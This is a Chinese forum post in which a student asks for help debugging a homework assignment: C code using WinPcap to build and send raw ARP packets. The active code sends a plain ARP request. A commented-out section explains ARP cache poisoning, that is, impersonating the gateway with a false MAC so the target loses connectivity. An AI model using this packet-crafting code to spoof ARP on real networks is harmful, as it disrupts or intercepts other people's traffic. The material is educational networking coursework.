老师留的作业 请大家看看ARP攻击
程序没有错,可以发送数据包了,但是我用WireShark抓的包里面可以读出DLC帧头,ARP帧就不行了,不知道为什么了。我实在看不出哪里有问题了··帮忙啊请大家调试一下,那些赋值语句和MAC地址的初始化都可以进行,但是抓取的包就是错的 为什么啊··附件有抓包的图片 帮帮忙啊··
#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>
#include <Devioctl.h>
//#pragma comment(lib, "Packet.lib")
#pragma comment(lib,"wpcap.lib")
#pragma comment(lib,"ws2_32.lib")
#define PCAP_SRC_IF_STRING "rpcap://"
////////////////////////////DLC帧头----14字节
typedef struct tagDLCHeader
{
unsigned char DesMAC[6];
unsigned char SrcMAC[6];
unsigned short Ethertype;
} DLCHEADER, *PDLCHEADER;
/////////////////////////ARP结构-------28字节
typedef struct tagARPFrame
{
unsigned short HW_Type;
unsigned short Prot_Type;
unsigned char HW_Addr_Len;
unsigned char Prot_Addr_Len;
unsigned short Opcode;
unsigned char Send_HW_Addr[6];
unsigned long Send_Prot_Addr;
unsigned char Targ_HW_Addr[6];
unsigned long Targ_Prot_Addr;
unsigned char padding[18];
} ARPFRAME, *PARPFRAME;
///////////////////////////前两者构成数据报
typedef struct tagARPPacket
{
DLCHEADER dlcHeader;
ARPFRAME arpFrame;
} ARPPACKET, *PARPPACKET;
void FormatStrToMAC(const LPSTR lpHWAddrStr, unsigned char *HWAddr);
//////////////////////////主函数
void main()
{
pcap_t *fp;
char errbuf[PCAP_ERRBUF_SIZE];
int j;
pcap_if_t *alldevs;
pcap_if_t *d;
int inum;
int i=0;
pcap_t *adhandle;
unsigned long cnt=1;
ARPPACKET *p;
/////////////////////////////////////////////////////////////////////////////////////////////////////
ARPPACKET ARPPacket; // 定义ARPPACKET结构
memset(&ARPPacket, 0, sizeof(ARPPacket));// 数据包初始化
p=&ARPPacket;
/*
/////////////////////////////////// DLC帧头初始化
ARPPacket.dlcHeader.SrcMAC[0]=0x00;
ARPPacket.dlcHeader.SrcMAC[1]=0x1b;
ARPPacket.dlcHeader.SrcMAC[2]=0x77;
ARPPacket.dlcHeader.SrcMAC[3]=0x99;
ARPPacket.dlcHeader.SrcMAC[4]=0x47;
ARPPacket.dlcHeader.SrcMAC[5]=0xcd;
ARPPacket.dlcHeader.DesMAC[0]=0xff;
ARPPacket.dlcHeader.DesMAC[1]=0xff;
ARPPacket.dlcHeader.DesMAC[2]=0xff;
ARPPacket.dlcHeader.DesMAC[3]=0xff;
ARPPacket.dlcHeader.DesMAC[4]=0xff;
ARPPacket.dlcHeader.DesMAC[5]=0xff;
///////////////////////////////////////// 源MAC
ARPPacket.arpFrame.Send_HW_Addr[0]=0x00;
ARPPacket.arpFrame.Send_HW_Addr[1]=0x1b;
ARPPacket.arpFrame.Send_HW_Addr[2]=0x77;
ARPPacket.arpFrame.Send_HW_Addr[3]=0x99;
ARPPacket.arpFrame.Send_HW_Addr[4]=0x47;
ARPPacket.arpFrame.Send_HW_Addr[5]=0xcd;
ARPPacket.arpFrame.Send_Prot_Addr=inet_addr("192.168.1.116"); // 源IP--攻击时冒充网关,填入错误MAC,
//可使目的主机MAC缓存错误,导致无法上网
////////////////////////////////////////目的MAC
FormatStrToMAC("1016d357822e",ARPPacket.arpFrame.Targ_HW_Addr); // 目的MAC
ARPPacket.arpFrame.Targ_Prot_Addr=inet_addr("192.168.1.1");// 目的IP
/*ARPPacket.arpFrame.Targ_HW_Addr[0]=0x00;
ARPPacket.arpFrame.Targ_HW_Addr[1]=0x1b;
ARPPacket.arpFrame.Targ_HW_Addr[2]=0x77;
ARPPacket.arpFrame.Targ_HW_Addr[3]=0x99;
ARPPacket.arpFrame.Targ_HW_Addr[4]=0x47;
ARPPacket.arpFrame.Targ_HW_Addr[5]=0xcd;
ARPPacket.arpFrame.Opcode=htons((unsigned short)0x1); // arp包类型
//////////////////自动填充的常量///////////////////////////
ARPPacket.dlcHeader.Ethertype=htons((unsigned short)0x0806); // DLC Header的以太网类型
ARPPacket.arpFrame.HW_Type=htons((unsigned short)1); // 硬件类型
ARPPacket.arpFrame.Prot_Type=htons((unsigned short)0x0800); // 上层协议类型
ARPPacket.arpFrame.HW_Addr_Len=(unsigned char)6; // MAC地址长度
ARPPacket.arpFrame.Prot_Addr_Len=(unsigned char)4; // IP地址长度
*/
//////////////////////填充完毕/////////////////
//////////////////////////////////////////////////////////////////////////////////////////////
FormatStrToMAC("ffffffffffff",ARPPacket.dlcHeader.DesMAC);
FormatStrToMAC("001b779947cd",ARPPacket.dlcHeader.SrcMAC); // DLC帧头
ARPPacket.dlcHeader.Ethertype = htons((unsigned short)0x0806); // DLC Header的以太网类型
ARPPacket.arpFrame.HW_Type = htons(1); // 硬件类型
ARPPacket.arpFrame.Prot_Type = htons(0x0800); // 上层协议类型
ARPPacket.arpFrame.HW_Addr_Len = 6; // MAC地址长度
ARPPacket.arpFrame.Prot_Addr_Len =4; // IP地址长度
ARPPacket.arpFrame.Opcode = htons(0x0001); // arp包类型
FormatStrToMAC("001b779947cd",ARPPacket.arpFrame.Send_HW_Addr); // 源MAC
ARPPacket.arpFrame.Send_Prot_Addr = inet_addr("192.168.1.116"); // 源IP
FormatStrToMAC("ffffffffffff",ARPPacket.arpFrame.Targ_HW_Addr); // 目的MAC
ARPPacket.arpFrame.Targ_Prot_Addr = inet_addr("192.168.1.124"); // 目的IP
/* 获取本机设备列表 */
if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
/* 打印列表 */
for(d=alldevs; d; d=d->next)
{
printf("%d. %s", ++i, d->name);
if (d->description)
printf(" (%s)\n", d->description);
else
printf(" (No description available)\n");
}
if(i==0)
{
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
return -1;
}
printf("Enter the interface number (1-%d):",i);
scanf("%d", &inum);
if(inum < 1 || inum > i)
{
printf("\nInterface number out of range.\n");
/* 释放设备列表 */
pcap_freealldevs(alldevs);
return -1;
}
/* 跳转到选中的适配器 */
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* 打开设备 */
if ( (fp= pcap_open(d->name, // 设备名
60, // 65535保证能捕获到不同数据链路层上的每个数据包的全部内容
1, // 混杂模式
1000, // 读取超时时间
NULL, // 远程机器验证
errbuf // 错误缓冲池
) ) == NULL)
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
/* 释放设备列表 */
pcap_freealldevs(alldevs);
return -1;
}
if (pcap_sendpacket(fp,&ARPPacket,60) != 0)
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(fp));
return;
}
return;
}
void FormatStrToMAC(const LPSTR lpHWAddrStr, unsigned char *HWAddr)
{
unsigned int i, index = 0, value, temp;
unsigned char c;
_strlwr(lpHWAddrStr); // 转换成小写
for (i = 0; i < strlen(lpHWAddrStr); i++)
{
c = *(lpHWAddrStr + i);
if (( c>='0' && c<='9' ) || ( c>='a' && c<='f' ))
{
if (c>='0' && c<='9')
temp = c - '0'; // 数字
if (c>='a' && c<='f')
temp = c - 'a' + 0xa; // 字母
if ( (index % 2) == 1 )
{
value = value*0x10 + temp;
HWAddr[index/2] = value;
}
else value = temp;
index++;
}
if (index == 12)
break;
}
} :funk: 好可怕的病毒
页:
[1]